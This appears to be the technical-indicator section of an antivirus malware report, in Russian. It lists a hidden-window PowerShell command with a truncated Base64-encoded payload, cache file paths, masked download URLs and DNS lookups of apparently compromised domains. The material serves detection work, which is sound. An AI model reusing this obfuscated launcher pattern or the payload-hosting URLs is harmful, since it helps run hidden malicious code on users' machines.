Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABJAHAAcgBhAHgAdgBoAHcAYwBrAGEAYQA9ACcASABnAGUAcgBzAGsAZABlACcAOwAkAFoAcgBoAG8AaQB4AHYAYQB6AGkAegB6ACAAPQAgACcANwA2ADkAJwA7ACQARQB0AGIAbQB3AHMAaABhAHoAPQAnAEQAdABrAGUAagBjAG8AeAB...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- http://ac#####eastrologys.com/wp-content/Itz9w25/
- http://fe###legal.com/uploads/OIf3/
- http://si###uehair.com/saloon/guWvE535/
- DNS ASK ac#####eastrologys.com
- DNS ASK co###roof.com
- DNS ASK co#####ocontinuo.com
- DNS ASK fe###legal.com
- DNS ASK si###uehair.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABJAHAAcgBhAHgAdgBoAHcAYwBrAGEAYQA9ACcASABnAGUAcgBzAGsAZABlACcAOwAkAFoAcgBoAG8AaQB4AHYAYQB6AGkAegB6ACAAPQAgACcANwA2ADkAJwA7ACQARQB0AGIAbQB3AHMAaABhAHoAPQAnAEQAdABrAGUAagBjAG8AeAB...' (со скрытым окном)